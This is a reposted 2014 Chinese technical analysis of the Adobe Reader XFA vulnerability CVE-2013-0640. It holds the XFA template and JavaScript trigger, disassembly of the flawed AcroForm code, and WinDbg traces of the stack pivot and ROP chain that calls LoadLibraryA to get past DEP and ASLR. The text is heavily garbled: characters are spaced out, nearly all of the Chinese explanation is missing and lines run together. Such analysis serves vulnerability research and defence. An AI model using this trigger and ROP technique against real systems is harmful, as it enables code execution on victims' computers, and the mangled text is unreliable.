搜索

[8001] 2014-05-02_5.1技术回顾:CVE-2013-0640AdobeReader任意代码执行漏洞分析

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-17
2014-05-02_5.1技术回顾:CVE-2013-0640AdobeReader任意代码执行漏洞分析 5 . 1 C V E - 2 0 1 3 - 0 6 4 0   A d o b e R e a d e r v s c e n   F r e e B u f   2 0 1 4 - 0 5 - 0 2 1 ) A d o b e   R e a d e r   X I   ( 1 1 . 0 . 0 1   a n d   e a r l i e r )   f o r   W i n d o w s   a n d   M a c i n t o s h A d o b e   R e a d e r   X   ( 1 0 . 1 . 5   a n d   e a r l i e r )   f o r   W i n d o w s   a n d   M a c i n t o s h A d o b e   R e a d e r   9 . 5 . 3   a n d   e a r l i e r   9 . x   v e r s i o n s   f o r   W i n d o w s ,   M a c i n t o s h   a n d   L i n u x A d o b e   A c r o b a t   X I   ( 1 1 . 0 . 0 1   a n d   e a r l i e r )   f o r   W i n d o w s   a n d   M a c i n t o s h A d o b e   A c r o b a t   X   ( 1 0 . 1 . 5   a n d   e a r l i e r )   f o r   W i n d o w s   a n d   M a c i n t o s h A d o b e   A c r o b a t   9 . 5 . 3   a n d   e a r l i e r   9 . x   v e r s i o n s   f o r   W i n d o w s   a n d   M a c i n t o s h 2 ) A d o b e R e a d e r C V E - 2 0 1 3 - 0 6 4 0 , A b o b e R e a d e r 9 1 0 1 1 2 0 1 3 2 , A d o b e   R e a d e r A d o b e S y s t e m P o r t a b l e   D o c u m e n t   F o r m a t ( P D F ) . A d o b e   X M L   f o r m s   a r c h i t e c t u r e ( X F A ) X M L P D F , P D F 1 . 5 使 P D F , B u g . 3 ) C V E - 2 0 1 3 - 0 6 4 0 2 0 1 3 , A d o b e s e c u r i t y   a d v i s o r y   A P S A 1 3 - 0 2 , 广 ( C V E - 2 0 1 3 - 0 6 4 0 C V E - 2 0 1 3 - 0 6 4 1 ) I n t e l M c A f e e . 1 ) J a v a S c r i p t X F A , R O P D E P A S L R , , . X F A s u b f o r m , s u b f o r m c h o i c e L i s t , s u b f o r m ( ) . < t e m p l a t e   x m l n s = " h t t p : / / w w w . x f a . o r g / s c h e m a / x f a - t e m p l a t e / 2 . 8 / " > < s u b f o r m   n a m e = " f o r m 1 " > < p a g e S e t > < p a g e A r e a   n a m e = " p a g e 1 " > < c o n t e n t A r e a   / > < s u b f o r m > < f i e l d   n a m e = " f i e l d 0 " > < u i > < c h o i c e L i s t > < / c h o i c e L i s t > < / u i > < / f i e l d > < / s u b f o r m >
< / p a g e A r e a > < / p a g e S e t > < s u b f o r m > < d r a w   n a m e = " r e c t 1 "   / > < / s u b f o r m > < / s u b f o r m > B u g , B u g J a v a S c r i p t 使 c h o i c e L i s t , s u b f o r m k e e p . p r e v i o u s c o n t e n t A r e a , c h o i c e L i s t s u b f o r m , B u g ( ) . f u n c t i o n   T r i g g e r ( ) { M e s s W i t h T h e M e m o r y ( ) ; x f a . r e s o l v e N o d e ( " x f a [ 0 ] . f o r m [ 0 ] . f o r m 1 [ 0 ] . # p a g e S e t [ 0 ] . p a g e 1 [ 0 ] . # s u b f o r m [ 0 ] . f i e l d 0 [ 0 ] . # u i " ) . o n e O f C h i l d = c h o i c e L i s t ; } v a r   c h o i c e L i s t   =   n u l l ; f u n c t i o n   S t a r t ( ) { c h o i c e L i s t = x f a . r e s o l v e N o d e ( " x f a [ 0 ] . f o r m [ 0 ] . f o r m 1 [ 0 ] . # p a g e S e t [ 0 ] . p a g e 1 [ 0 ] . # s u b f o r m [ 0 ] . f i e l d 0 [ 0 ] . # u i [ 0 ] . # c h o i c e L i s t [ 0 ] " ) ; x f a . r e s o l v e N o d e ( " x f a [ 0 ] . f o r m [ 0 ] . f o r m 1 [ 0 ] . # s u b f o r m [ 0 ] . r e c t 1 " ) . k e e p . p r e v i o u s =   " c o n t e n t A r e a " ; d d d   =   a p p . s e t T i m e O u t ( " T r i g g e r ( ) ; " ,   1 ) ; } S t a r t ( ) ; 2 ) A b o b e   R e a d e r A c r o F o r m _ a p i , 0 x 2 0 9 0 7 F A 0 , 便 , U s e T h e U n i n i t i a l i z e d V a l u e 0 x 2 0 9 D 7 6 A E , G e t T h e B r o k e n O b j e c t . , 0 x 3 C , 0 x 3 C N U L L , 使 0 x 3 C 0 x 2 0 9 0 6 3 B 4 , c r a s h _ h e r e , ( ) . . t e x t : 2 0 9 0 7 F A 0   U s e T h e U n i n i t i a l i z e d V a l u e . t e x t : 2 0 9 0 7 F A 0 . t e x t : 2 0 9 0 7 F A 0   v a r _ 1 0   =   d w o r d   p t r   - 1 0 h . t e x t : 2 0 9 0 7 F A 0   v a r _ 4   =   d w o r d   p t r   - 4 g . t e x t : 2 0 9 0 7 F A 0   a r g _ 0   =   d w o r d   p t r   8 . t e x t : 2 0 9 0 7 F A 0   a r g _ 4   =   d w o r d   p t r   0 C h . t e x t : 2 0 9 0 7 F A 0   a r g _ 8   =   d w o r d   p t r   1 0 h . t e x t : 2 0 9 0 7 F A 0 . t e x t : 2 0 9 0 7 F A 0   p u s h   4 . t e x t : 2 0 9 0 7 F A 2   m o v   e a x ,   o f f s e t   s u b _ 2 0 C E 4 5 C 9 . t e x t : 2 0 9 0 7 F A 7   c a l l   _ _ E H _ p r o l o g 3 . t e x t : 2 0 9 0 7 F A C   m o v   e b x ,   e c x . t e x t : 2 0 9 0 7 F A E   a n d   [ e b p + v a r _ 1 0 ] ,   0 . t e x t : 2 0 9 0 7 F B 2   p u s h   [ e b p + a r g _ 8 ] . t e x t : 2 0 9 0 7 F B 5   l e a   e a x ,   [ e b p + a r g _ 8 ] . t e x t : 2 0 9 0 7 F B 8   p u s h   [ e b p + a r g _ 4 ] . t e x t : 2 0 9 0 7 F B B   p u s h   e a x . t e x t : 2 0 9 0 7 F B C   c a l l   G e t T h e B r o k e n O b j e c t   / /   . t e x t : 2 0 9 0 7 F C 1   m o v   e s i ,   [ e a x ] . t e x t : 2 0 9 0 7 F C 3   t e s t   e s i ,   e s i . t e x t : 2 0 9 0 7 F C 5   m o v   [ e b p + a r g _ 4 ] ,   e s i . t e x t : 2 0 9 0 7 F C 8   j z   s h o r t   l o c _ 2 0 9 0 7 F C D . t e x t : 2 0 9 0 7 F C A   i n c   d w o r d   p t r   [ e s i + 4 ]   / /   ? . t e x t : 2 0 9 0 7 F C D
. t e x t : 2 0 9 0 7 F C D   l o c _ 2 0 9 0 7 F C D : . t e x t : 2 0 9 0 7 F C D   l e a   e c x ,   [ e b p + a r g _ 8 ] . t e x t : 2 0 9 0 7 F D 0   m o v   [ e b p + v a r _ 4 ] ,   1 . t e x t : 2 0 9 0 7 F D 7   c a l l   s u b _ 2 0 8 A 7 F A 1 . t e x t : 2 0 9 0 7 F D C   m o v   e d i ,   [ e b x + 3 C h ] . t e x t : 2 0 9 0 7 F D F   t e s t   e d i ,   e d i . t e x t : 2 0 9 0 7 F E 1   j z   s h o r t   l o c _ 2 0 9 0 8 0 1 2 . t e x t : 2 0 9 0 7 F E 3   c m p   d w o r d   p t r   [ e s i + 3 C h ] ,   0   / / 0 , . . t e x t : 2 0 9 0 7 F E 7   j z   s h o r t   l o c _ 2 0 9 0 7 F F 2 . t e x t : 2 0 9 0 7 F E 9   m o v   e c x ,   [ e s i + 3 C h ]   / /   . . t e x t : 2 0 9 0 7 F E C   p u s h   e b x . t e x t : 2 0 9 0 7 F E D   c a l l   c r a s h _ h e r e 0 x 3 C 使 , , A d o b e   R e a d e r ( ) . . t e x t : 2 0 9 0 6 3 B 4   c r a s h _ h e r e . t e x t : 2 0 9 0 6 3 B 4   a r g _ 0   =   d w o r d   p t r   4 . t e x t : 2 0 9 0 6 3 B 4 . t e x t : 2 0 9 0 6 3 B 4   p u s h   e s i . t e x t : 2 0 9 0 6 3 B 5   p u s h   e d i . t e x t : 2 0 9 0 6 3 B 6   m o v   e d i ,   e c x   / /   E D I . t e x t : 2 0 9 0 6 3 B 8   m o v   e s i ,   [ e d i + 4 0 h ] . t e x t : 2 0 9 0 6 3 B B   t e s t   e s i ,   e s i . t e x t : 2 0 9 0 6 3 B D   j z   s h o r t   l o c _ 2 0 9 0 6 3 F E . . . . t e x t : 2 0 9 0 6 3 F E   l o c _ 2 0 9 0 6 3 F E : . t e x t : 2 0 9 0 6 3 F E . t e x t : 2 0 9 0 6 3 F E   p o p   e d i . t e x t : 2 0 9 0 6 3 F F   p o p   e s i . t e x t : 2 0 9 0 6 4 0 0   r e t n   4 t e x t : 2 0 9 0 6 4 0 0   c r a s h _ h e r e   e n d p E D I , . 0 x 2 0 9 D 8 D 7 1 , I n i t i a l i z e B r o k e n O b j e c t . , ; 0 x 3 C ( ) . . t e x t : 2 0 9 D 8 D 7 1   I n i t i a l i z e B r o k e n O b j e c t . t e x t : 2 0 9 D 8 D 7 1 . t e x t : 2 0 9 D 8 D 7 1   a r g _ 0   =   d w o r d   p t r   4 . t e x t : 2 0 9 D 8 D 7 1   a r g _ 4   =   d w o r d   p t r   8 . t e x t : 2 0 9 D 8 D 7 1   a r g _ 8   =   d w o r d   p t r   0 C h . t e x t : 2 0 9 D 8 D 7 1 . t e x t : 2 0 9 D 8 D 7 1   p u s h   e s i . t e x t : 2 0 9 D 8 D 7 2   p u s h   [ e s p + 4 + a r g _ 0 ] . t e x t : 2 0 9 D 8 D 7 6   m o v   e s i ,   e c x . t e x t : 2 0 9 D 8 D 7 8   c a l l   s u b _ 2 0 9 E 7 1 3 7   / /   E C X . . t e x t : 2 0 9 D 8 D 7 D   m o v   e c x ,   [ e s p + 4 + a r g _ 4 ]   / /   v t a b l e . . t e x t : 2 0 9 D 8 D 8 1   m o v   d w o r d   p t r   [ e s i ] ,   o f f s e t   b r o k e n _ o b j e c t . t e x t : 2 0 9 D 8 D 8 7   m o v   e a x ,   [ e c x ] . t e x t : 2 0 9 D 8 D 8 9   x o r   e d x ,   e d x . t e x t : 2 0 9 D 8 D 8 B   c m p   e a x ,   e d x
. t e x t : 2 0 9 D 8 D 8 D   m o v   [ e s i + 2 4 h ] ,   e a x . t e x t : 2 0 9 D 8 D 9 0   j z   s h o r t   l o c _ 2 0 9 D 8 D 9 5 . t e x t : 2 0 9 D 8 D 9 2   i n c   d w o r d   p t r   [ e a x + 4 ] . t e x t : 2 0 9 D 8 D 9 5 . t e x t : 2 0 9 D 8 D 9 5   l o c _ 2 0 9 D 8 D 9 5 :   / /   O f f s e t   0 x 3 c   i s   n o t   s e t . . t e x t : 2 0 9 D 8 D 9 5   m o v   e a x ,   [ e s p + 4 + a r g _ 8 ] . t e x t : 2 0 9 D 8 D 9 9   m o v   [ e s i + 2 C h ] ,   e a x . t e x t : 2 0 9 D 8 D 9 C   m o v   [ e s i + 3 0 h ] ,   e d x . t e x t : 2 0 9 D 8 D 9 F   m o v   [ e s i + 3 4 h ] ,   e d x . t e x t : 2 0 9 D 8 D A 2   m o v   [ e s i + 3 8 h ] ,   e d x . t e x t : 2 0 9 D 8 D A 5   m o v   e a x ,   o f f _ 2 0 E 9 3 D 7 4 . t e x t : 2 0 9 D 8 D A A   a n d   d w o r d   p t r   [ e s i + 2 8 h ] ,   0 F F F F F F F 0 h . t e x t : 2 0 9 D 8 D A E   m o v   [ e s i + 0 C h ] ,   e a x . t e x t : 2 0 9 D 8 D B 1   m o v   d w o r d   p t r   [ e s i + 1 0 h ] ,   0 C 9 h . t e x t : 2 0 9 D 8 D B 8   m o v   e c x ,   [ e c x ] . t e x t : 2 0 9 D 8 D B A   c m p   e c x ,   e d x . t e x t : 2 0 9 D 8 D B C   j z   s h o r t   l o c _ 2 0 9 D 8 D C 1 . t e x t : 2 0 9 D 8 D B E   m o v   [ e c x + 3 C h ] ,   e s i . t e x t : 2 0 9 D 8 D C 1 . t e x t : 2 0 9 D 8 D C 1   l o c _ 2 0 9 D 8 D C 1 : . t e x t : 2 0 9 D 8 D C 1   m o v   e a x ,   e s i . t e x t : 2 0 9 D 8 D C 3   p o p   e s i . t e x t : 2 0 9 D 8 D C 4   r e t n   0 C h . t e x t : 2 0 9 D 8 D C 4   I n i t i a l i z e B r o k e n O b j e c t   e n d p 使 , E S I + 0 x 3 C , 0 , ; . B u g , B u g , . 3 ) , 0 x 3 C 0 , , . 0 x 3 C , , , . 0 x 3 C 0 × 4 1 , , 0 x 3 C . . t e x t : 2 0 8 A 5 4 A 9   m o v   e d i ,   [ e d i + 3 C h ]   ;   0 , . . t e x t : 2 0 8 A 5 4 A C   t e s t   e d i ,   e d i . t e x t : 2 0 8 A 5 4 A E   j z   s h o r t   l o c _ 2 0 8 A 5 4 E 0 . t e x t : 2 0 8 A 5 4 B 0   c m p   d w o r d   p t r   [ e s i + 3 C h ] ,   0   ;   0 ? . t e x t : 2 0 8 A 5 4 B 4   j z   s h o r t   l o c _ 2 0 8 A 5 4 C 1 . t e x t : 2 0 8 A 5 4 B 6   p u s h   d w o r d   p t r   [ e b p - 1 0 h ] . t e x t : 2 0 8 A 5 4 B 9   m o v   e c x ,   [ e s i + 3 C h ]   ;   . . t e x t : 2 0 8 A 5 4 B C   c a l l   c r a s h _ h e r e . t e x t : 2 0 8 A 5 4 C 1 . t e x t : 2 0 8 A 5 4 C 1   l o c _ 2 0 8 A 5 4 C 1 :   ;   C O D E   X R E F :   . t e x t : 2 0 8 A 5 4 B 4 j . t e x t : 2 0 8 A 5 4 C 1   i n c   d w o r d   p t r   [ e d i + 4 ] . t e x t : 2 0 8 A 5 4 C 4   m o v   e c x ,   [ e s i + 3 C h ] . t e x t : 2 0 8 A 5 4 C 7   t e s t   e c x ,   e c x   ; . t e x t : 2 0 8 A 5 4 C 9   j z   s h o r t   S k i p E x p l o i t P o i n t . t e x t : 2 0 8 A 5 4 C B   d e c   d w o r d   p t r   [ e c x + 4 ]   ;   [ [ + 0 x 3 C ] + 0 x 4 ] = = 0 ? : . t e x t : 2 0 8 A 5 4 C E   j n z   s h o r t   S k i p E x p l o i t P o i n t . t e x t : 2 0 8 A 5 4 D 0   m o v   e a x ,   [ e c x ] ; , .
. t e x t : 2 0 8 A 5 4 D 2   p u s h   e b x . t e x t : 2 0 8 A 5 4 D 3   c a l l   d w o r d   p t r   [ e a x ]   ;   . t e x t : 2 0 8 A 5 4 D 5 . t e x t : 2 0 8 A 5 4 D 5   S k i p E x p l o i t P o i n t :   ;   C O D E   X R E F :   . t e x t : 2 0 8 A 5 4 C 9 j C V E - 2 0 1 3 - 0 6 4 0 , 使 , c a l l   d w o r d   p t r   [ e a x ] , 使 A S L R ( ) , 使 R O P D E P ( ) . . t e x t : 2 0 8 A 5 4 D 3   c a l l   d w o r d   p t r   [ e a x ]   ;   , . R O P , R O P . R O 0 x 2 0 9 b 9 f 5 0 , ( ) . . t e x t : 2 0 9 B 9 F 4 2   m o v   e a x ,   [ e c x + 4 ] . t e x t : 2 0 9 B 9 F 4 5   t e s t   e a x ,   e a x . t e x t : 2 0 9 B 9 F 4 7   j z   s h o r t   l o c _ 2 0 9 B 9 F 5 7 . t e x t : 2 0 9 B 9 F 4 9   p u s h   e a x . t e x t : 2 0 9 B 9 F 4 A   m o v   e a x ,   d w o r d _ 2 1 2 8 C 6 6 C . t e x t : 2 0 9 B 9 F 4 F   c a l l   d w o r d   p t r   [ e a x + 5 C h ] . t e x t : 2 0 9 B 9 F 5 2   p o p   e c x . t e x t : 2 0 9 B 9 F 5 3   m o v z x   e a x ,   a x . t e x t : 2 0 9 B 9 F 5 6   r e t n , 0 x 2 0 9 b 9 f 5 0 , , E A X E S P R O P , ( ) . . t e x t : 2 0 9 B 9 F 4 2   m o v   e a x ,   [ e c x + 4 ] . t e x t : 2 0 9 B 9 F 4 5   t e s t   e a x ,   e a x . t e x t : 2 0 9 B 9 F 4 7   j z   s h o r t   l o c _ 2 0 9 B 9 F 5 7 . t e x t : 2 0 9 B 9 F 4 9   p u s h   e a x . t e x t : 2 0 9 B 9 F 4 A   m o v   e a x ,   d w o r d _ 2 1 2 8 C 6 6 C . t e x t : 2 0 9 B 9 F 4 A   ;   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - . t e x t : 2 0 9 B 9 F 4 F   d b   0 F F h . t e x t : 2 0 9 B 9 F 5 0   ;   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - . t e x t : 2 0 9 B 9 F 5 0   p u s h   e a x . t e x t : 2 0 9 B 9 F 5 1   p o p   e s p . t e x t : 2 0 9 B 9 F 5 2   p o p   e c x . t e x t : 2 0 9 B 9 F 5 3   m o v z x   e a x ,   a x . t e x t : 2 0 9 B 9 F 5 6   r e t n , , ( s x e   l d   A c r o F o r m . a p i ) , 0 x 2 0 9 b 9 f 5 0 0 x 1 B 9 F 5 0 b p , A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 1 3 5 a e , E S P E A X , E A X . ( ) . 0 : 0 0 9 >   s x e   l d   A c r o F o r m . a p i ( 7 8 0 . a 0 c ) :   C + +   E H   e x c e p t i o n   -   c o d e   e 0 6 d 7 3 6 3   ( f i r s t   c h a n c e ) M o d L o a d :   6 1 5 1 0 0 0 0   6 2 1 b d 0 0 0   C : P r o g r a m   F i l e s   ( x 8 6 ) A d o b e R e a d e r   1 1 . 0 R e a d e r p l u g _ i n s A c r o F o r m . a p i e a x = 0 0 0 0 0 0 0 0   e b x = 0 0 0 0 0 0 0 0   e c x = 0 0 0 0 0 0 0 0   e d x = 0 0 0 0 0 0 0 0   e s i = 0 0 5 0 d c 5 0   e d i = 0 0 5 0 d c 1 8 e i p = 0 0 b 6 c 6 2 2   e s p = 0 0 5 0 d a e 4   e b p = 0 0 5 0 d b 2 0   i o p l = 0   n v   u p   e i   p l   n z   n a   p e   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 0 0 0 2 0 6 0 0 b 6 c 6 2 2   8 3 c 4 0 4   a d d   e s p , 4
0 : 0 0 0 >   p e a x = 1 1 8 4 3 9 3 4   e b x = 0 0 0 0 0 0 0 1   e c x = 1 1 8 5 0 2 5 8   e d x = 0 0 0 0 0 0 0 0   e s i = 1 9 b 8 e f 2 c   e d i = 0 7 4 b e e 4 8 e i p = 6 1 6 c 9 f 5 1   e s p = 0 0 5 0 d d 5 c   e b p = 0 0 5 0 d d 9 c   i o p l = 0   n v   u p   e i   p l   z r   n a   p e   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 2 0 0 2 4 6 A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 1 3 5 a e : 6 1 6 c 9 f 5 1   5 c   p o p   e s p 0 : 0 0 0 >   p e a x = 1 1 8 4 3 9 3 4   e b x = 0 0 0 0 0 0 0 1   e c x = 1 1 8 5 0 2 5 8   e d x = 0 0 0 0 0 0 0 0   e s i = 1 9 b 8 e f 2 c   e d i = 0 7 4 b e e 4 8 e i p = 6 1 6 c 9 f 5 2   e s p = 1 1 8 4 3 9 3 4   e b p = 0 0 5 0 d d 9 c   i o p l = 0   n v   u p   e i   p l   z r   n a   p e   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 2 0 0 2 4 6 A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 1 3 5 a f : 6 1 6 c 9 f 5 2   5 9   p o p   e c x , R O , R E T , , ( ) . e a x = 0 0 0 0 3 9 3 4   e b x = 0 0 0 0 0 0 0 1   e c x = 6 1 6 c 9 f 5 0   e d x = 0 0 0 0 0 0 0 0   e s i = 1 9 b 8 e f 2 c   e d i = 0 7 4 b e e 4 8 e i p = 6 1 6 c 9 f 5 6   e s p = 1 1 8 4 3 9 3 8   e b p = 0 0 5 0 d d 9 c   i o p l = 0   n v   u p   e i   p l   z r   n a   p e   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 2 0 0 2 4 6 A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 1 3 5 b 3 : 6 1 6 c 9 f 5 6   c 3   r e t 0 : 0 0 0 >   d d   e s p 1 1 8 4 3 9 3 8   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9 1 1 8 4 3 9 4 8   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9 1 1 8 4 3 9 5 8   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9 1 1 8 4 3 9 6 8   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9 1 1 8 4 3 9 7 8   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9 1 1 8 4 3 9 8 8   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9 1 1 8 4 3 9 9 8   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9 1 1 8 4 3 9 a 8   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9   6 1 5 1 1 0 4 9 A c r o F o r m . a p i 0 × 1 0 4 9 , R O P , R E T , . . t e x t : 2 0 8 0 1 0 4 8   t e s t   e b x ,   e a x . t e x t : 2 0 8 0 1 0 4 A   j z   s h o r t   l o c _ 2 0 8 0 1 0 5 5 / / . t e x t : 2 0 8 0 1 0 4 8   d b   8 5 h . t e x t : 2 0 8 0 1 0 4 9   ;   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - . t e x t : 2 0 8 0 1 0 4 9   r e t n . t e x t : 2 0 8 0 1 0 4 A   ;   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - R E T , R E T 0 × 2 4 8 0 , . t e x t : 2 0 8 0 1 0 4 9   r e t n 0 × 2 4 8 0 ( ) . 0 : 0 0 0 >   d d   e s p + 0 x 2 4 8 0 1 1 8 4 5 d b c   6 1 8 d d 4 1 a   6 1 a 6 8 5 5 1   6 1 d a e 0 0 1   6 1 b 7 8 6 9 9 1 1 8 4 5 d c c   5 4 7 4 6 5 4 7   6 1 9 b d 5 1 a   6 1 a 6 8 5 5 1   6 1 d a e 0 0 5 1 1 8 4 5 d d c   6 1 b 7 8 6 9 9   5 0 7 0 6 d 6 5   6 1 9 b d 5 1 a   6 1 a 6 8 5 5 1 1 1 8 4 5 d e c   6 1 d a e 0 0 9   6 1 b 7 8 6 9 9   4 1 6 8 7 4 6 1   6 1 9 b d 5 1 a 1 1 8 4 5 d f c   6 1 a 6 8 5 5 1   6 1 d a e 0 0 d   6 1 b 7 8 6 9 9   4 1 4 1 4 1 0 0 1 1 8 4 5 e 0 c   6 1 9 b d 5 1 a   6 1 a 6 8 5 5 1   6 1 d a e 0 0 e   6 1 b 7 8 6 9 9 1 1 8 4 5 e 1 c   6 9 7 2 7 7 6 6   6 1 9 b d 5 1 a   6 1 a 6 8 5 5 1   6 1 d a e 0 1 2
1 1 8 4 5 e 2 c   6 1 b 7 8 6 9 9   4 1 0 0 6 5 7 4   6 1 9 b d 5 1 a   6 1 a 6 8 5 5 1 0 : 0 0 0 >   d d   e s p + 0 x 2 4 7 c 1 1 8 4 5 d b 8   6 1 5 1 1 0 4 9   6 1 8 d d 4 1 a   6 1 a 6 8 5 5 1   6 1 d a e 0 0 1 1 1 8 4 5 d c 8   6 1 b 7 8 6 9 9   5 4 7 4 6 5 4 7   6 1 9 b d 5 1 a   6 1 a 6 8 5 5 1 1 1 8 4 5 d d 8   6 1 d a e 0 0 5   6 1 b 7 8 6 9 9   5 0 7 0 6 d 6 5   6 1 9 b d 5 1 a 1 1 8 4 5 d e 8   6 1 a 6 8 5 5 1   6 1 d a e 0 0 9   6 1 b 7 8 6 9 9   4 1 6 8 7 4 6 1 1 1 8 4 5 d f 8   6 1 9 b d 5 1 a   6 1 a 6 8 5 5 1   6 1 d a e 0 0 d   6 1 b 7 8 6 9 9 1 1 8 4 5 e 0 8   4 1 4 1 4 1 0 0   6 1 9 b d 5 1 a   6 1 a 6 8 5 5 1   6 1 d a e 0 0 e 1 1 8 4 5 e 1 8   6 1 b 7 8 6 9 9   6 9 7 2 7 7 6 6   6 1 9 b d 5 1 a   6 1 a 6 8 5 5 1 1 1 8 4 5 e 2 8   6 1 d a e 0 1 2   6 1 b 7 8 6 9 9   4 1 0 0 6 5 7 4   6 1 9 b d 5 1 a e s p + 0 × 2 4 8 0 , 便 , R O P e s p + 0 × 2 4 8 0 , R O P ( ) . 0 : 0 0 0 >   u   6 1 8 d d 4 1 a A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 2 2 6 a 7 7 : 6 1 8 d d 4 1 a   5 4   p u s h   e s p 6 1 8 d d 4 1 b   5 e   p o p   e s i 6 1 8 d d 4 1 c   c 3   r e t [ e s p + 0 x 2 4 8 0 ] + 0 x 4 0 : 0 0 0 >   u   6 1 a 6 8 5 5 1 A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 3 b 1 b a e : 6 1 a 6 8 5 5 1   5 8   p o p   e a x [ e s p + 0 x 2 4 8 0 ] + 0 x 8 E A X , . 6 1 a 6 8 5 5 2   c 3   r e t [ e s p + 0 x 2 4 8 0 ] + 0 x C A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 4 c 1 c f 6 : 6 1 b 7 8 6 9 9   5 9   p o p   e c x [ e s p + 0 x 2 4 8 0 ] + 0 x 1 0 E C X 6 1 b 7 8 6 9 a   c 3   r e t [ e s p + 0 x 2 4 8 0 ] + 0 x C 0 : 0 0 0 >   u   6 1 9 b d 5 1 a A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 3 0 6 b 7 7 : 6 1 9 b d 5 1 a   8 9 0 8   m o v   d w o r d   p t r   [ e a x ] , e c x E C X E A X 6 1 9 b d 5 1 c   c 3   r e t , . 6 1 d a e 0 0 1   4 7   6 5   7 4   5 4   6 5   6 d   7 0   5 0   6 1   7 4   6 8   4 1   0 0   6 6   7 7   7 2   6 9   7 4   G e t T e m p P a t h A . f w r i t 6 1 d a e 0 1 3   6 5   0 0   7 7   6 2   0 0   4 3   7 2   7 9   7 0   7 4   5 3   7 4   7 2   6 9   6 e   6 7   5 4   6 f   e . w b . C r y p t S t r i n g T o 6 1 d a e 0 2 5   4 2   6 9   6 e   6 1   7 2   7 9   4 1   0 0   6 e   7 4   6 4   6 c   6 c   0 0   5 2   7 4   6 c   4 4   B i n a r y A . n t d l l . R t l D 6 1 d a e 0 3 7   6 5   6 3   6 f   6 d   7 0   7 2   6 5   7 3   7 3   4 2   7 5   6 6   6 6   6 5   7 2   0 0   7 7   6 3   e c o m p r e s s B u f f e r . w c 6 1 d a e 0 4 9   7 3   7 3   7 4   7 2   0 0   4 1   4 4   4 d   5 2   6 5   7 3   6 f   7 5   7 2   6 3   6 5   4 3   6 f   s s t r . , , A P I C A L L , R O P , A P I L o a d L i b r a r y A , M S V C R 1 0 0 . d l l , E S P 便 L o a d L i b r a r y A . e a x = 6 1 b 7 b 2 3 4   e b x = 0 0 0 0 0 0 0 1   e c x = 1 1 8 4 6 0 0 0   e d x = 0 0 0 0 0 0 0 0   e s i = 1 1 8 4 5 d c 0   e d i = 1 1 8 4 5 f f c e i p = 6 1 a 2 9 2 a c   e s p = 1 1 8 4 5 f b c   e b p = 0 0 5 0 d d 9 c   i o p l = 0   n v   u p   e i   p l   n z   n a   p e   n c c s = 0 0 2 3   s s = 0 0 2 b   d s = 0 0 2 b   e s = 0 0 2 b   f s = 0 0 5 3   g s = 0 0 2 b   e f l = 0 0 2 0 0 2 0 6 A c r o F o r m ! D l l U n r e g i s t e r S e r v e r + 0 x 3 7 2 9 0 9 : 6 1 a 2 9 2 a c   f f 1 0   c a l l   d w o r d   p t r   [ e a x ]   d s : 0 0 2 b : 6 1 b 7 b 2 3 4 = { k e r n e l 3 2 ! L o a d L i b r a r y A   ( 7 5 4 2 4 b c 6 ) } 1 1 8 4 5 f b c   6 1 d a c e 4 6   6 1 a 8 7 6 6 4   6 1 a 6 8 5 5 1   c c c c 0 2 2 c   6 1 8 7 2 c 7 4   6 1 9 e 5 6 7 b   6 1 5 b e d 7 2   6 1 a 2 9 4 3 b 6 1 d a c e 4 6   4 d   5 3   5 6   4 3   5 2   3 1   3 0   3 0   2 e   6 4   6 c   6 c   0 0   0 0   8 d   0 4   5 f   7 5   M S V C R 1 0 0 . d l l . . . . A P I G e t P r o c A d d r e s s , 1 M S V C R 1 0 0 . d l l , 2 w c s s t r ( )
